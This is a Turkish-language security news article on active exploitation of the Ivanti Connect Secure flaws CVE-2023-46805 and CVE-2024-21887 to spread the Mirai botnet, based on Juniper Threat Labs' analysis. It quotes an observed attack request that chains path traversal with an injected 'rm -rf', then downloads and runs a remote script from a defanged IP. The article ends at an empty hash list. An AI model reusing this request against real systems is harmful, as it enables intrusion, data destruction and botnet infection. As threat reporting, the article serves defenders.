Bilgisayar Korsanları Ivanti Pulse Güvenliği Açıklarından Aktif Olarak Yararlanıyor

Juniper Threat Labs, Ivanti Pulse Secure VPN cihazlarındaki güvenlik açıklarını hedef alan aktif istismar girişimlerini bildirdi.

CVE-2023-46805 ve CVE-2024-21887 olarak tanımlanan bu güvenlik açıkları, diğer kötü amaçlı yazılımların yanı sıra Mirai botnet’ini dağıtmak için kullanıldı ve dünya çapında ağ güvenliğine önemli bir tehdit oluşturdu.

CVE-2023-46805, Ivanti Connect Secure (ICS) ve Ivanti Policy Secure ağ geçitlerini etkileyen kritik bir güvenlik açığıdır.

Bu güvenlik açığı, uzaktaki saldırganların kimlik doğrulama mekanizmalarını atlamasına ve kısıtlı kaynaklara yetkisiz erişim elde etmesine olanak tanır.

Kusur, yeterli güvenlik kontrollerinin bulunmadığı /api/v1/totp/user-backup-code uç noktasında bulunuyor. Bu, saldırganların bir yol geçiş kusurundan yararlanmasına ve halka açık alanlara uygun kimlik doğrulama olmadan erişmesine olanak tanır.

Etkilenen sürümler arasında hem Ivanti Connect Secure hem de Ivanti Policy Secure Gateway’lerin 9.x ve 22.x’i yer alıyor.

İkinci güvenlik açığı olan CVE-2024-21887, Ivanti Connect Secure ve Ivanti Policy Secure’un web bileşenlerinde bulunan bir komut ekleme kusurudur.

Bu güvenlik açığı, saldırganların cihazda rastgele komutlar yürütmek için özel hazırlanmış istekler göndermesine olanak tanır.

Bu kusur internet üzerinden kullanılabilir ve /api/v1/license/key-status/; API çağrısı.

Saldırganlar, bu uç noktaya erişim sağlamak için CVE-2023-46805 güvenlik açığından yararlanarak kötü amaçlı yükler enjekte edebilir ve bu da kabuk komutlarının yürütülmesine ve Mirai botnet dahil olmak üzere kötü amaçlı yazılımların yayılmasına yol açabilir.

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.

Mirai Botnet Teslimatı

Juniper Threat Labs’ın analizi, saldırganların kabuk komut dosyaları aracılığıyla Mirai yüklerini dağıtmak için bu güvenlik açıklarını kullandığı örnekleri ortaya çıkardı.

Aşağıda gözlemlenen isteğin bir örneği verilmiştir:

Kodlanmış URL’nin kodu şu şekilde çözülür (Bu, WordPress’te bir kod bloğunda gelecektir)
GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1

Gözlemlenen saldırı, dosyaları silmeyi, uzak sunucudan bir komut dosyası indirmeyi, yürütülebilir izinleri ayarlamayı ve komut dosyasını çalıştırmayı deneyen ve potansiyel olarak sisteme bulaşmaya yol açan bir komut dizisi içeriyor.

wtf.sh içeriği (WordPress’te bu bir kod bloğu halinde gelmelidir) Dosya adlarının çeşitli rahatsız edici ve aşağılayıcı terimler kullandığını ve yalnızca bu araştırma için gösterildiğini unutmayın.

Bu araçların ulaşmaya çalıştığı beş sistem dizini vardır: “/tmp”, “/var/run”, “/mnt”, “/root” ve “/”. Belirli bir URL’den “lol” adlı bir dosya alır (http://192[.]3[.]152[.]183/mips) ulaşabileceği bir yer bulduğunda.

İndirilen dosyanın indirildikten sonra çalıştırılmasına izin verir ve “0day_machine” argümanıyla çalıştırır. “||” kullanma sonraki komutların yalnızca daha önce dizin değiştirme denemelerinin başarısız olması durumunda çalıştırılmasını sağlar.

Bu, listede ulaşılabilen ilk dizinde aşağıdaki komutun çalıştığı anlamına gelir.

Juniper, Mirai botnetinin bir parçası olduğu belirlenen yükleri analiz ederek bu güvenlik açıklarının oluşturduğu tehdidin ciddiyetini ortaya koydu.

Mirai botnet dağıtımı için Ivanti Pulse Secure’un güvenlik açıklarından yararlanmak, siber tehditlerin gelişen manzarasının altını çiziyor.

IDP lisansına sahip Juniper Networks SRX Serisi Yeni Nesil Güvenlik Duvarı (NGFW) müşterileri, CVE-2023-46805 ve CVE-2024-21887 için özel imzalar kullanılarak bu güvenlik açıklarına karşı korunur.

Ivanti Pulse Secure cihazlarını kullanan kuruluşlara, sağlanan yamaları derhal uygulamaları ve bu ve gelecekteki güvenlik açıklarına karşı koruma sağlamak için güvenlik duruşlarını gözden geçirmeleri tavsiye edilmektedir.

Uzlaşma Göstergeleri

Mirai’nin Hash Değerleri: